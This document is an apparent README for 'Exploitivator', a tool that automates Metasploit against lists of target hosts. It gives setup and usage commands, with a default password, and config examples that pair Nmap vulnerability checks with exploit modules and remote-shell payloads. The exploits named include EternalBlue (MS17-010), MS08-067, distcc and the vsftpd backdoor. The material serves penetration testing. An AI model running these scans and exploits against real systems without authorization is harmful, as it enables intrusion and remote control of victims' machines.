Exploitivator – Automate Metasploit Scanning And Exploitation
This has only been tested on Kali.
It depends on the msfrpc module for Python, described in detail here: https://www.trustwave.com/Resources/SpiderLabs-Blog/Scripting-Metasploit-using-MSGRPC/
Install the necessary Kali packages and the PostgreSQL gem for Ruby: apt-get install postgresql libpq-dev git-core gem install pg
Install current version of the msfrpc Python module from git: git clone git://github.com/SpiderLabs/msfrpc.git msfrpc cd msfrpc/python-msfrpc python setup.py install
Usage
Before running either of the scripts, load msfconsole and start the MSGRPC service.
MSGRPC can be started with msfrpcd in Metasploit as follows: load msgrpc Pass=abc123
The results of scans and/or exploitation will appear in the Metasploit console and in the ouput file(s) (msf_scan_output.txt and exploitivator_output.txt).
Use MSFScan to run multiple Metasploit scans against a group of target hosts. Use Exploitivator to run Nmap script scans against a group of target hosts and automatically exploit any reported as vulnerable.
Exploitivator
Command line usage:
Examples: The application can be run as follows, where ‘10.128.108.178’ is the IP address of the attack machine, ‘hosts.txt’ is a list of target hosts, ‘msf’ is the Metasploit Postgres username and ‘abc123’ is the Metasploit Postgres password: ./exploitivator.py -l 10.128.108.178 -f hosts.txt -u msf -m abc123
MSFScan
Command line usage: ./msf_scan.py filename ./msf_scan.py filename MSF_DB_Username MSF_DB_Password
Examples: The application can be run as follows, where ‘hosts.txt’ is a list of target hosts, ‘msf’ is the Metasploit Postgres username and ‘abc123’ is the Metasploit Postgres password: ./msf_scan.py hosts.txt msf abc123
To run with ‘hosts.txt’ as a list of target hosts, using the script’s default Metasploit Postgres username(msf) and the script’s default Metasploit Postgres password(abc123): ./msf_scan.py hosts.txt
Config Files
Both scripts rely on config files to provide details of required Nmap and Metasploit scamns and attacks.
MSFScan
The script uses a config file with the name ‘scan_types.cfg’. This contains a list of paths for any Metasploit scans the are to run against the targets. e.g.: auxiliary/scanner/dcerpc/endpoint_mapper auxiliary/scanner/smb/smb_version auxiliary/scanner/x11/open_x11 auxiliary/scanner/discovery/ipv6_multicast_ping auxiliary/scanner/discovery/ipv6_neighbor auxiliary/scanner/smb/smb_login
Exploitivator
This script uses two config files(exploitivator_scan.cfg and exploitivator.cfg). One to specify Nmap scans and parameters(exploitivator_scan.cfg), and one to specify Metasploit payloads and parameters(exploitivator.cfg). These use ‘##’ as a separator and have the following formats.
exploitivator_scan.cfg: [Label]##[Nmap command line parameters]##[Nmap command line parameters for file output]##[Optional – grep command to be used if Nmap’s greppable output is being used]
In the above format:
- The first section is a label linking the scan to the exploit
- The second section is the part of the Namp command line which specifies details of the type of scan to run, such as port and script
- The third section is the part of the Namp command line that defines the Nmap output file (Exploitivator handles XML or greppable Nmap output)
- The optional fourth section is the gep command that you wish to use in order to identify a vulnerable target within a ‘.gnmap’ file
An example file content is shown below: SMB_08-067##-p U:137,U:139,T:139,T:445 –script smb-vuln-ms08-067.nse##-oX ms_08_067.xml SMB_09-050##-p U:137,U:139,T:139,T:445 –script smb-vuln-cve2009-3103.nse##-oX ms_09_050.xml SMB_10-054##-p U:137,U:139,T:139,T:445 –script smb-vuln-ms10-054.nse##-oX ms_10_054.xml SMB_10-061##-p U:137,U:139,T:139,T:445 –script smb-vuln-ms10-061.nse##-oX ms_10_061.xml SMB_17-010##-p U:137,U:139,T:139,T:445 –script smb-vuln-ms17-010##-oX ms_17_010.xml DistCC##-p 3632 -sSV##-oG distcc.gnmap##grep “3632/open/tcp//distccd” JavaRMI##-p 1099 -sSV##-oG javarmi.gnmap##grep “1099/open/tcp//rmi VSFTPBackDoor##-p 21 -sSV##-oG vsftp_backdoor.gnmap##grep “vsftpd 2.3.4”
exploitivator.cfg: [Label]##[Metasploit exploit path]##[Optional – Metasploit payload details]
An example file content is shown below: SMB_08-067##exploit/windows/smb/ms08_067_netapi##windows/meterpreter/bind_tcp SMB_09-050##exploit/windows/smb/ms09_050_smb2_negotiate_func_index##windows/meterpreter/bind_tcp SMB_10-061##exploit/windows/smb/ms10_061_spoolss##windows/meterpreter/bind_tcp SMB_17-010##exploit/windows/smb/ms17_010_eternalblue##windows/meterpreter/bind_tcp DistCC##exploit/unix/misc/distcc_exec##cmd/unix/bind_ruby JavaRMI##exploit/multi/misc/java_rmi_server##php/meterpreter/bind_tcp VSFTPBackDoor##exploit/unix/ftp/vsftpd_234_backdoor##none
References
Starting and connecting to MSGRPC: https://www.packtpub.com/mapt/book/networking_and_servers/9781785280696/9/ch09lvl1sec60/metasploit-scripting-with-msgrpc
Setting RHOSTS to use a file instead of a range: http://travisaltman.com/metasploit-set-rhosts-file/